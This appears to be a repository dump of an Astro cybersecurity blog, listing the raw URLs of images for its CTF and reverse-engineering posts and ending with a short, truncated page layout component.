https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/bruteit/Untitled12.png -------------------------------------------------------------------------------- /src/content/images/bruteit/Untitled2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/bruteit/Untitled2.png -------------------------------------------------------------------------------- /src/content/images/bruteit/Untitled3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/bruteit/Untitled3.png -------------------------------------------------------------------------------- /src/content/images/bruteit/Untitled4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/bruteit/Untitled4.png -------------------------------------------------------------------------------- /src/content/images/bruteit/Untitled5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/bruteit/Untitled5.png -------------------------------------------------------------------------------- /src/content/images/bruteit/Untitled6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/bruteit/Untitled6.png -------------------------------------------------------------------------------- /src/content/images/bruteit/Untitled7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/bruteit/Untitled7.png -------------------------------------------------------------------------------- /src/content/images/bruteit/Untitled8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/bruteit/Untitled8.png -------------------------------------------------------------------------------- /src/content/images/bruteit/Untitled9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/bruteit/Untitled9.png -------------------------------------------------------------------------------- /src/content/images/bruteit/hero.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/bruteit/hero.jpg -------------------------------------------------------------------------------- /src/content/images/chocolatefactory/hero.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/chocolatefactory/hero.jpg -------------------------------------------------------------------------------- /src/content/images/cicada/hero.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/cicada/hero.jpeg -------------------------------------------------------------------------------- /src/content/images/ctfcollv2/hero.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/ctfcollv2/hero.png -------------------------------------------------------------------------------- /src/content/images/dailybugle/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/dailybugle/Untitled.png -------------------------------------------------------------------------------- /src/content/images/dailybugle/Untitled1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/dailybugle/Untitled1.png -------------------------------------------------------------------------------- /src/content/images/dailybugle/Untitled10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/dailybugle/Untitled10.png -------------------------------------------------------------------------------- /src/content/images/dailybugle/Untitled11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/dailybugle/Untitled11.png -------------------------------------------------------------------------------- /src/content/images/dailybugle/Untitled12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/dailybugle/Untitled12.png -------------------------------------------------------------------------------- /src/content/images/dailybugle/Untitled13.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/dailybugle/Untitled13.png -------------------------------------------------------------------------------- /src/content/images/dailybugle/Untitled14.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/dailybugle/Untitled14.png -------------------------------------------------------------------------------- /src/content/images/dailybugle/Untitled2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/dailybugle/Untitled2.png -------------------------------------------------------------------------------- /src/content/images/dailybugle/Untitled3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/dailybugle/Untitled3.png -------------------------------------------------------------------------------- /src/content/images/dailybugle/Untitled4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/dailybugle/Untitled4.png -------------------------------------------------------------------------------- /src/content/images/dailybugle/Untitled5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/dailybugle/Untitled5.png -------------------------------------------------------------------------------- /src/content/images/dailybugle/Untitled6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/dailybugle/Untitled6.png -------------------------------------------------------------------------------- /src/content/images/dailybugle/Untitled7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/dailybugle/Untitled7.png -------------------------------------------------------------------------------- /src/content/images/dailybugle/Untitled8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/dailybugle/Untitled8.png -------------------------------------------------------------------------------- /src/content/images/dailybugle/Untitled9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/dailybugle/Untitled9.png -------------------------------------------------------------------------------- /src/content/images/dailybugle/hero.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/dailybugle/hero.png -------------------------------------------------------------------------------- /src/content/images/dav/hero.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/dav/hero.jpeg -------------------------------------------------------------------------------- /src/content/images/default.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/default.png -------------------------------------------------------------------------------- /src/content/images/dogcat/hero.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/dogcat/hero.png -------------------------------------------------------------------------------- /src/content/images/ethicalcourse/hero.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/ethicalcourse/hero.jpeg -------------------------------------------------------------------------------- /src/content/images/ezsteg/hero.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/ezsteg/hero.png -------------------------------------------------------------------------------- /src/content/images/geolocimages/hero.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/geolocimages/hero.jpeg -------------------------------------------------------------------------------- /src/content/images/githappens/hero.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/githappens/hero.png -------------------------------------------------------------------------------- /src/content/images/impossiblechallenge/hero.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/impossiblechallenge/hero.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/Image01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/Image01.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/Image02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/Image02.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/Image03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/Image03.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/Image04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/Image04.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/Image05.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/Image05.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/Image06.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/Image06.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/Image07.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/Image07.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/Image08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/Image08.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/Image09.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/Image09.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/Image10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/Image10.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/Image11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/Image11.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/Image12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/Image12.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/Image13.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/Image13.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/Image14.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/Image14.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/Image15.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/Image15.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/Image17.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/Image17.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/Image18.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/Image18.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/Image19.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/Image19.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/Image20.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/Image20.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/Image21.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/Image21.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/Image22.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/Image22.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-1/hero.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-1/hero.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-2/XREF.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-2/XREF.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-2/afl++.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-2/afl++.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-2/checksec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-2/checksec.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-2/document-1658231026.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-2/document-1658231026.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-2/document-1658231086.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-2/document-1658231086.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-2/document-1658231198.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-2/document-1658231198.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-2/document-1658232014.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-2/document-1658232014.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-2/elf-struct.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-2/elf-struct.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-2/hero.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-2/hero.jpeg -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-2/httpd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-2/httpd.png -------------------------------------------------------------------------------- /src/content/images/introduction-to-reverse-engineering-part-2/mips-reverse-shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/introduction-to-reverse-engineering-part-2/mips-reverse-shell.png -------------------------------------------------------------------------------- /src/content/images/jacktrades/hero.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/jacktrades/hero.jpeg -------------------------------------------------------------------------------- /src/content/images/jockerctf/hero.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/jockerctf/hero.jpeg -------------------------------------------------------------------------------- /src/content/images/lazy-admin/hero.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/lazy-admin/hero.jpeg -------------------------------------------------------------------------------- /src/content/images/lian-yu/hero.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/lian-yu/hero.jpeg -------------------------------------------------------------------------------- /src/content/images/libraryctf/hero.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/libraryctf/hero.jpeg -------------------------------------------------------------------------------- /src/content/images/madness/hero.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/madness/hero.png -------------------------------------------------------------------------------- /src/content/images/mrrobotctf/hero.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/mrrobotctf/hero.jpg -------------------------------------------------------------------------------- /src/content/images/nax/hero.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/nax/hero.png -------------------------------------------------------------------------------- /src/content/images/ninjaskills/hero.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/ninjaskills/hero.png -------------------------------------------------------------------------------- /src/content/images/passwordcrack/hero.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/passwordcrack/hero.jpeg -------------------------------------------------------------------------------- /src/content/images/pickle-rick-ctf/hero.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/pickle-rick-ctf/hero.jpeg -------------------------------------------------------------------------------- /src/content/images/radare2/hero.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/radare2/hero.png -------------------------------------------------------------------------------- /src/content/images/simple-ctf/hero.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/simple-ctf/hero.png -------------------------------------------------------------------------------- /src/content/images/smaggrotto/hero.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/smaggrotto/hero.jpeg -------------------------------------------------------------------------------- /src/content/images/stealthcopter-ctf/hero.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/stealthcopter-ctf/hero.jpeg -------------------------------------------------------------------------------- /src/content/images/stegcourse/hero.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/stegcourse/hero.jpeg -------------------------------------------------------------------------------- /src/content/images/thompson/hero.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/thompson/hero.jpg -------------------------------------------------------------------------------- /src/content/images/tomghost/hero.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/tomghost/hero.jpeg -------------------------------------------------------------------------------- /src/content/images/ultratechctf/hero.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/ultratechctf/hero.png -------------------------------------------------------------------------------- /src/content/images/uopeasy/hero.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/uopeasy/hero.jpg -------------------------------------------------------------------------------- /src/content/images/webscan/hero.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/webscan/hero.png -------------------------------------------------------------------------------- /src/content/images/wiresharkctf/hero.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/wiresharkctf/hero.jpeg -------------------------------------------------------------------------------- /src/content/images/worderlandsctf/hero.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/worderlandsctf/hero.jpeg -------------------------------------------------------------------------------- /src/content/images/yearrabbit/hero.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/yearrabbit/hero.jpeg -------------------------------------------------------------------------------- /src/env.d.ts: -------------------------------------------------------------------------------- 1 | /// 2 | /// 3 | -------------------------------------------------------------------------------- /src/layouts/MainLayout.astro: -------------------------------------------------------------------------------- 1 | --- 2 | import "@fontsource-variable/rubik"; 3 | import "../styles/base.css"; 4 | 5 | import { ViewTransitions } from "astro:transitions"; 6 | import BaseHead from "../components/BaseHead.astro"; 7 | import Footer from "../components/Footer.astro"; 8 | import Header from "../components/Header.astro"; 9 | 10 | interface Props { 11 | title: string; 12 | description: string; 13 | heroImage?: string; 14 | } 15 | 16 | const { title, description, heroImage } = Astro.props; 17 | --- 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 |
    27 |
    28 | 29 |
    30 |